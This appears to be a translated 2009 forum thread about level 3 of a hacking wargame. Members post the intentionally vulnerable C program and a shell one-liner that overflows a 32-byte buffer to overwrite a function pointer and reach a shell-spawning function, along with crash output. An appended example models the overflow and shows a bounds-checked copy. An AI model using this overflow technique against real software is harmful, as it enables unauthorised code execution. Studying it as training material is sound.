micha Posted September 21, 2009
Who else?

Vitschidir Posted September 21, 2009
*raises hand*

Neongenesis Posted September 21, 2009
level3@io:~$ cat /levels/level3.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int good(int addr) {
    printf("Address of hmm: %p\n", addr);
}

int hmm() {
    printf("Win.\n");
    execl("/bin/sh", "sh", NULL);
}

extern char **environ;

int main(int argc, char **argv) {
    int i, limit;

    for(i = 0; environ[i] != NULL; i++)
        memset(environ[i], 0x00, strlen(environ[i]));

    int (*fptr)(int) = good;
    char buf[32];

    if(strlen(argv[1]) <= 40) limit = strlen(argv[1]);

    for(i = 0; i <= limit; i++) {
        buf[i] = argv[1][i];
        if(i < 36) buf[i] = 0x41;
    }

    int (*hmmptr)(int) = hmm;

    (*fptr)((int)hmmptr);

    return 0;
}
level3@io:/levels$ ./level3 $(echo -n "123456789012345678901234567890123456"; echo -ne "\x7f\x84\x04\x08")
damn, crap

Ellaire Posted September 21, 2009
you guys suck

Radi Posted September 21, 2009
radi@shaman:~$ ./level3 $(echo -n "123456789012345678901234567890123456"; echo -ne "\x7f\x84\x04\x08")
Address of hmm: 0x804851f
*** stack smashing detected ***: ./level3 terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f0e138]
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7f0e0f0]
./level3[0x8048668]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe0)[0xb7e37450]
./level3[0x8048480]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:01 5800032 /home/radi/level3
08049000-0804a000 rw-p 00000000 08:01 5800032 /home/radi/level3
0804a000-0806b000 rw-p 0804a000 00:00 0 [heap]
b7e20000-b7e21000 rw-p b7e20000 00:00 0
b7e21000-b7f6a000 r-xp 00000000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.so
b7f6a000-b7f6b000 r--p 00149000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.so
b7f6b000-b7f6d000 rw-p 0014a000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.so
b7f6d000-b7f71000 rw-p b7f6d000 00:00 0
b7f77000-b7f81000 r-xp 00000000 08:01 5947410 /lib/libgcc_s.so.1
b7f81000-b7f82000 rw-p 0000a000 08:01 5947410 /lib/libgcc_s.so.1
b7f82000-b7f84000 rw-p b7f82000 00:00 0
b7f84000-b7f85000 r-xp b7f84000 00:00 0 [vdso]
b7f85000-b7f9f000 r-xp 00000000 08:01 5949259 /lib/ld-2.7.so
b7f9f000-b7fa1000 rw-p 00019000 08:01 5949259 /lib/ld-2.7.so
bfa85000-bfa9a000 rw-p bffeb000 00:00 0 [stack]
Aborted
radi@shaman:~$
and now?

Neongenesis Posted September 21, 2009
Radi wrote: and now?
for you that would be /level3 $(echo -n "123456789012345678901234567890123456"; echo -ne "\x1f\x85\x04\x08")

Radi Posted September 21, 2009
radi@shaman:~$ ./level3 $(echo -n "123456789012345678901234567890123456"; echo -ne "\x1f\x85\x04\x08")
Address of hmm: 0x804851f
*** stack smashing detected ***: ./level3 terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7ee2138]
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7ee20f0]
./level3[0x8048668]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe0)[0xb7e0b450]
[0x0]
======= Memory map: ========
08048000-08049000 r-xp 00000000 08:01 5800032 /home/radi/level3
08049000-0804a000 rw-p 00000000 08:01 5800032 /home/radi/level3
0804a000-0806b000 rw-p 0804a000 00:00 0 [heap]
b7df4000-b7df5000 rw-p b7df4000 00:00 0
b7df5000-b7f3e000 r-xp 00000000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.so
b7f3e000-b7f3f000 r--p 00149000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.so
b7f3f000-b7f41000 rw-p 0014a000 08:01 5949273 /lib/tls/i686/cmov/libc-2.7.so
b7f41000-b7f45000 rw-p b7f41000 00:00 0
b7f4b000-b7f55000 r-xp 00000000 08:01 5947410 /lib/libgcc_s.so.1
b7f55000-b7f56000 rw-p 0000a000 08:01 5947410 /lib/libgcc_s.so.1
b7f56000-b7f58000 rw-p b7f56000 00:00 0
b7f58000-b7f59000 r-xp b7f58000 00:00 0 [vdso]
b7f59000-b7f73000 r-xp 00000000 08:01 5949259 /lib/ld-2.7.so
b7f73000-b7f75000 rw-p 00019000 08:01 5949259 /lib/ld-2.7.so
bf94b000-bf960000 rw-p bffeb000 00:00 0 [stack]
Aborted
radi@shaman:~$
Well, now I'm much wiser! Great program.

Neongenesis Posted September 21, 2009
just look at what it does and what the address is for :D the point is really only that it's pointless, like herb's sig ^^ the whole thing, which is also where the program code comes from, is just a game with 26+ levels per server; this one was level3. The idea is to work your way to a new level through holes in the code... this one is still pretty easy :D
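
The copy loop from the level3.c posted above, as an added example that is not part of the thread or the wargame's own code: it runs that loop against a 48-byte model of the stack region to count the bytes written past `buf[32]`, next to a bounds-checked form. `struct frame`, `MODEL_SIZE`, `copy_like_level3`, `copy_checked` and the marker bytes in `sample` are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE   32  /* char buf[32] in level3.c */
#define MODEL_SIZE 48  /* assumption: room to observe writes past buf */

/* Stand-in for the stack region around buf; indexes >= BUF_SIZE model
 * whatever the compiler placed after it (layout is build-specific). */
struct frame { unsigned char mem[MODEL_SIZE]; };

/* The loop from level3.c run against the model; returns bytes written
 * outside buf. limit starts at 0 here, the original leaves it unset. */
size_t copy_like_level3(struct frame *f, const char *arg)
{
    size_t limit = 0, spilled = 0, i;
    if (strlen(arg) <= 40)
        limit = strlen(arg);
    for (i = 0; i <= limit; i++) {   /* <= also copies the NUL */
        f->mem[i] = (unsigned char)arg[i];
        if (i < 36)
            f->mem[i] = 0x41;
        if (i >= BUF_SIZE)
            spilled++;
    }
    return spilled;
}

/* Hardened form: the bound is the destination size. Returns 0 on
 * success, -1 (nothing written) if arg plus its NUL does not fit. */
int copy_checked(struct frame *f, const char *arg)
{
    size_t len = strlen(arg);
    if (len >= BUF_SIZE)
        return -1;
    memcpy(f->mem, arg, len + 1);
    return 0;
}

/* Constructed 40-byte input: 36 filler bytes, then 4 marker bytes. */
static const char sample[] =
    "123456789012345678901234567890123456" "\xAA\xBB\xCC\xDD";

int main(void)
{
    struct frame f = {{0}};
    printf("%zu bytes past buf, checked copy returns %d\n",
           copy_like_level3(&f, sample), copy_checked(&f, sample));
    return 0;
}
```

The length check in level3.c compares against 40 while the buffer holds 32 bytes, and the `<=` in the loop adds one more byte, which is why the model records writes at indexes 32 through 40.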